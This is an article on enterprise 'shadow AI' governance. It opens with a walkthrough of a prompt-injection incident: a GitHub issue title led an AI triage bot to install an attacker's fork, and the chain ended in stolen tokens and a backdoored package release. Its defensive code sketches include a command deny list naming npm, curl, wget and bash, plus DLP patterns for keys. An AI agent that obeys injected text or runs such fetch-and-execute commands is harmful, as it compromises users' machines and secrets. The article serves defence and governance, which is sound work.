Shadow AI is your second operating model. The one you didn't approve.

200 shadow AI tools per 1,000 employees. None of them approved. What you can actually do now.

It only took twelve words.

A developer opened an issue on a GitHub repository. The title - twelve words, nothing that looked dangerous - was fed directly into an AI triage bot running Anthropic's claude-code-action inside the company's software pipeline. The bot read the title, treated it as a legitimate instruction and ran npm install pointing to an attacker-controlled fork.

That single command kicked off a five-step chain:

The forked package ran a hidden script that stole API credentials,

The attacker then flooded GitHub Actions' shared cache with 10GB of junk data to force legitimate entries out,

The poisoned cache was restored by the nightly release workflow,

Production tokens were exfiltrated, and

A backdoored version of the package was published to npm.

Every developer who updated Cline that night got a second AI agent - OpenClaw - silently installed on their machine with full shell access. 4,000 machines compromised. Eight hours before anyone noticed.

Nobody hacked the model.

The agent did exactly what it was built to do: read things and act on them. The gap was simpler and more damaging than a technical flaw. Nobody had thought through what “reading things” actually means when an agent has real system access and no human between the input and the action.
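One way to picture the missing control is a gate that sits between what an agent reads and what it is allowed to run. The sketch below is only an illustration of that idea, not the pipeline from the incident: the allowlist, the `review_agent_command` function and its three verdicts are all hypothetical names chosen for this example.

```python
import shlex

# Hypothetical allowlist: the only command prefixes the agent may run unattended.
ALLOWED_COMMANDS = {
    ("gh", "issue", "view"),
    ("gh", "issue", "comment"),
    ("gh", "label", "list"),
}

# Programs that can fetch or execute third-party code: always ask a human first.
NEEDS_HUMAN = {"npm", "npx", "pip", "curl", "wget", "bash", "sh"}

# Characters that let one shell command smuggle in another.
SHELL_METACHARS = set(";|&<>`$")


def review_agent_command(command: str) -> str:
    """Classify a command proposed by an agent as 'allow', 'escalate' or 'deny'."""
    if SHELL_METACHARS & set(command):
        return "deny"
    try:
        tokens = shlex.split(command)
    except ValueError:
        return "deny"  # malformed input such as an unclosed quote
    if not tokens:
        return "deny"
    if tokens[0] in NEEDS_HUMAN:
        return "escalate"  # a person approves before anything is installed
    if tuple(tokens[:3]) in ALLOWED_COMMANDS:
        return "allow"
    return "deny"  # default-deny: anything not listed is refused


if __name__ == "__main__":
    for cmd in ["gh issue view 42", "npm install github:attacker/fork", "rm -rf /"]:
        print(cmd, "->", review_agent_command(cmd))
```

The design choice that matters here is default-deny: text the agent has read can suggest a command, but only a short, pre-agreed list runs without a human in between.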

The GitHub exploit is more than a bug story. And what it reveals is hiding inside most large organisations right now.

The real problem hiding in plain sight

Most leaders still picture shadow AI as a compliance headache. An employee uses ChatGPT to draft a proposal. Someone pastes a client list into a free tool to clean up the formatting. Risky. A training issue.

That version of the problem is real. And I will come back to it - because one part of it has no technical solution at all.

What is happening inside most large organisations right now goes further than rogue tool use. Employees are connecting AI agents to internal databases, Slack channels, email systems and code repositories. They write prompts that run on schedules. They wire model outputs into workflows that touch real customers, real contracts and real money. IT does not know about most of it.

A 2025 analysis of 22.4 million enterprise AI prompts found 579,113 sensitive data exposures. Source code made up 30% of those leaks. Legal documents 22%. M&A data 12%. Nearly 17% came through personal free-tier accounts - invisible to every corporate control in existence. The same research found the average enterprise discovered 23 previously unknown AI tools per quarter.

Prompt Security's February 2026 field data shows organisations with 1,000 to 5,000 employees interact with 72 distinct AI sites every month through browsers alone - before counting IDE assistants, desktop apps, SaaS-embedded AI and connected services. Reco's 2025 State of Shadow AI Report puts mid-sized organisations at 200 shadow AI tools per 1,000 employees.



An operating model answers five questions:

what work gets done,

who does it,

how decisions get made,

where it happens and

what systems support it.

Your shadow AI answers all five. The work is real. The actors - human and agent - are real. The systems are your systems. The only thing missing is your approval.

Why the approved tool is losing to the banned one

The first move from IT and legal is predictable. Block the tools. Write a policy. Shut it down.

Yet it never works.

Microsoft found this at scale. As of August 2025, only 8 million of 450 million M365 commercial seats had active paid Copilot licences - roughly 1.8% adoption after two years. At Microsoft's own Ignite conference, IT buyers told sales reps: "I want 300 licences to go to zero. I don't even want it." The approved tool was slower and more locked down than the personal workaround. When the sanctioned option is worse than the banned one, the banned one wins.

Ironically, 69% of presidents and C-suite members are actively choosing speed over security. Not because they don't know the risk, but because the returns are too large to ignore.

So the shadow operating model keeps growing with executive cover. When something breaks - a data leak, an audit failure, a security incident - nobody owns it because nobody registered it.

The one thing no solution can reach

If an employee takes out a personal phone, opens ChatGPT on their own data plan and pastes in your strategy document, nothing in this article will stop it.

The model gateway will not see it.

Data loss prevention tools will not catch it.

Mobile device management only reaches company-owned devices.

No wall you can build extends to a personal device on a personal account.

NO TECHNICAL SOLUTION EXISTS FOR THIS SCENARIO.

The only real defence is making your approved tools FAST and GOOD ENOUGH that the workaround stops feeling worth it.

And being direct with people about what is actually at stake when they use personal accounts for company work. Not abstract risk. Specific consequences. For them and for the organisation.

Governance cannot eliminate this surface. It can shrink it. That is the honest goal.

What you can actually do now

Before we dive into solutions, I want to say that I have no commercial links to any vendor named here.

If you read the serious work on shadow AI from KPMG, ISACA, Reco and 1Password, the landscape becomes clear very quickly.

There is no shortage of quantified panic. We have endless data on how many employees use unsanctioned tools, how often source code leaks into prompts and what breach costs look like when AI is involved.

There are almost no public, named, independently verifiable case studies proving that “Company X deployed Y and shadow AI dropped by Z%.” You will find anonymous client anecdotes. You will find vendor narratives. You will not find hard proof.

Despite that, every credible governance body agrees on the exact same four operational moves.

Discover and inventory what is already running

Because you cannot govern what you cannot see.

ISACA makes this the imperative first step: continuous discovery via cloud logs, DLP tools and SaaS monitoring, feeding a single AI tool registry. KPMG agrees: an explicit AI system inventory is the foundation of any roadmap. 1Password's data shows over half of employees install apps without IT approval - which means manual attestation alone is useless.

Build one live table with tool name, owner, data touched and risk tier.

That is the only starting point that matters.
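As a rough illustration of that table, here is a minimal in-memory registry with the four columns named above. It is a sketch under stated assumptions: the class names, the three-level `RiskTier` scale and the helper methods are hypothetical, and a real registry would be fed by discovery tooling rather than by hand.

```python
from dataclasses import dataclass, field
from enum import Enum


class RiskTier(Enum):
    # Assumed three-level scale; use whatever tiers your risk function defines.
    LOW = 1
    MEDIUM = 2
    HIGH = 3


@dataclass
class AITool:
    name: str
    owner: str               # accountable person or team; empty if nobody claims it
    data_touched: list[str]  # e.g. ["source code", "client contracts"]
    risk_tier: RiskTier


@dataclass
class Registry:
    tools: dict[str, AITool] = field(default_factory=dict)

    def upsert(self, tool: AITool) -> None:
        """Add a tool or overwrite its entry, keyed by lower-cased name."""
        self.tools[tool.name.lower()] = tool

    def unowned(self) -> list[AITool]:
        """Tools nobody has taken responsibility for."""
        return [t for t in self.tools.values() if not t.owner.strip()]

    def by_risk(self) -> list[AITool]:
        """Highest-risk tools first, then alphabetical by name."""
        return sorted(
            self.tools.values(),
            key=lambda t: (-t.risk_tier.value, t.name.lower()),
        )


if __name__ == "__main__":
    registry = Registry()
    registry.upsert(AITool("Free-tier chatbot", "", ["client lists"], RiskTier.HIGH))
    registry.upsert(AITool("IDE assistant", "Platform team", ["source code"], RiskTier.MEDIUM))
    for tool in registry.by_risk():
        print(tool.risk_tier.name, tool.name, tool.owner or "(no owner)")
```

The `unowned` view is the useful one on day one: an entry with no owner is exactly the kind of tool nobody will answer for when something breaks.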

Give shadow tools a path to become official

Do not block everything you find. You will just push it deeper underground.

KPMG’s playbook is explicit: discover, then classify, then either adopt or retire. Reco maps the exact mechanic: identify unsanctioned tools with sustained usage past 60 days. Run a risk screen. If the tool is high-value and containable, pull it into your sanctioned catalogue with proper guardrails. If it is too risky, migrate those users to a safer alternative and kill the shadow instance.

Turn your inventory into a decision queue.

Graduate the good tools.

Kill the dangerous ones.

Leave nothing in the grey zone.
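The adopt-or-retire mechanic can be sketched as a small decision function. This is an illustration, not Reco's or KPMG's tooling: the 60-day threshold comes from the text above, while the `ShadowTool` fields, the `watch` state for tools that have not yet reached sustained usage, and the choice to retire low-value tools are assumptions made for this example.

```python
from dataclasses import dataclass

SUSTAINED_USE_DAYS = 60  # threshold from the mechanic described above


@dataclass
class ShadowTool:
    name: str
    days_in_use: int
    high_value: bool   # assumed input: result of a business-value review
    containable: bool  # assumed input: result of the risk screen


def decide(tool: ShadowTool) -> str:
    """Return 'watch', 'adopt' or 'retire' for one unsanctioned tool."""
    if tool.days_in_use <= SUSTAINED_USE_DAYS:
        # Assumption: not yet sustained usage, so it stays in the inventory only.
        return "watch"
    if tool.high_value and tool.containable:
        return "adopt"  # move into the sanctioned catalogue with guardrails
    # Too risky, or (by assumption) not valuable enough to justify the guardrails.
    return "retire"     # migrate users to a safer alternative, then remove it


if __name__ == "__main__":
    queue = [
        ShadowTool("meeting summariser", 95, high_value=True, containable=True),
        ShadowTool("browser extension", 120, high_value=True, containable=False),
        ShadowTool("new image tool", 12, high_value=False, containable=True),
    ]
    for tool in queue:
        print(f"{tool.name}: {decide(tool)}")
```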

Put AI behind real access and data controls

A policy document does not stop a data leak. You need technical chokepoints.

ISACA requires identity and access controls applied directly to AI endpoints. Mend.io's mitigation framework translates this into architecture: route AI API calls through secure gateways, enforce egress filtering for known AI domains, deploy DLP to stop sensitive data before it leaves. 1Password pushes the identity angle: device-trust checks and SSO to steer traffic through your sanctioned hub and block everything else.

Pick a gateway.

Route your AI traffic through it.

Enforce your rules in the traffic, not in a PDF.
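To make "rules in the traffic" concrete, here is a minimal sketch of the two checks a gateway might apply to each outbound request: an egress rule on the destination and a DLP scan of the prompt. Everything named here is hypothetical, including the host names, the `check_request` function and the three patterns, which are far narrower than a real DLP rule set.

```python
import re
from urllib.parse import urlparse

# Hypothetical policy: one sanctioned gateway host, plus example AI domains
# that must never be reached directly.
SANCTIONED_HOSTS = {"ai-gateway.internal.example"}
KNOWN_AI_DOMAINS = {"chat.example-ai.com", "api.example-llm.com"}

# Illustrative patterns only; production DLP covers far more than this.
SENSITIVE_PATTERNS = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
    "email_address": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
}


def check_request(url: str, prompt: str) -> tuple[bool, str]:
    """Return (allowed, reason) for one outbound AI request."""
    host = (urlparse(url).hostname or "").lower()
    if host in KNOWN_AI_DOMAINS:
        return False, f"egress blocked: {host} is not routed through the gateway"
    if host not in SANCTIONED_HOSTS:
        return False, f"unknown destination: {host}"
    for label, pattern in SENSITIVE_PATTERNS.items():
        if pattern.search(prompt):
            return False, f"dlp blocked: {label}"
    return True, "ok"


if __name__ == "__main__":
    print(check_request("https://chat.example-ai.com/", "hello"))
    print(check_request("https://ai-gateway.internal.example/v1/chat",
                        "Summarise this public press release"))
```

Note what this sketch cannot do: it only sees traffic that crosses the corporate network, which is exactly the limit described in the personal-device scenario earlier.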

Make audits and training a recurring habit

This is not a one-time clean-up project. The second operating model rebuilds itself every time a new model launches.

ISACA treats AI usage audits as a continuous cycle. Legal-in-the-Loop’s analysis of KPMG’s data turns this into operational rhythm: define what data can go where, build scenario-based training using real employee dilemmas - like pasting client contracts into ChatGPT - and update the catalogue as new tools appear. 1Password’s research shows employees knowingly ignore abstract policies because they do not understand how the rules apply to their daily work.

Schedule the audit.

Run the training with real examples.

Do it every quarter.

Assume your posture degrades the moment you stop looking.
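A quarterly rhythm is easy to state and easy to let slip, so it helps to have something that flags what is overdue. The sketch below assumes you keep a last-audited date per tool; the `overdue_audits` function and the 90-day approximation of a quarter are illustrative choices, not part of any framework cited here.

```python
from datetime import date, timedelta

AUDIT_INTERVAL = timedelta(days=90)  # "every quarter", approximated as 90 days


def overdue_audits(last_audited: dict[str, date], today: date) -> list[str]:
    """Return tool names whose last audit is older than the interval, oldest first."""
    overdue = [
        (when, name)
        for name, when in last_audited.items()
        if today - when > AUDIT_INTERVAL
    ]
    return [name for when, name in sorted(overdue)]


if __name__ == "__main__":
    audit_log = {
        "IDE assistant": date(2025, 11, 1),
        "meeting summariser": date(2026, 2, 1),
    }
    print(overdue_audits(audit_log, today=date(2026, 3, 1)))
```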

The second operating model does not wait

The reports will keep coming. The numbers will keep getting worse. What will not change is the mechanism: your people are solving real problems with tools you do not control, on infrastructure you cannot see, at a pace your governance function was not built to match.

The four moves above do not fix that overnight. They give you a fighting chance of knowing what your second operating model is doing before it makes the decision for you.

A note on how this was built

I spent eight hours on this article, verifying the reports, sources and potential moves that most governance frameworks present as fact. The non-existent case studies. The references that trace back to CSP-sponsored content. Half that time was spent killing claims I could not prove.

If someone in your network is about to write a shadow AI policy without a better tool, restack this first. Let them read the diagnosis before they ship the PDF.


Key sources:

KPMG - Shadow AI is already here

ISACA - Auditing unauthorized AI tools in the enterprise

Reco - State of shadow AI 2025

1Password - The enterprise AI crisis

Prompt Security - Shadow AI at scale, February 2026

Mend.io - Shadow AI risks and mitigations

Legal-in-the-Loop - How shadow AI rewrites your risk profile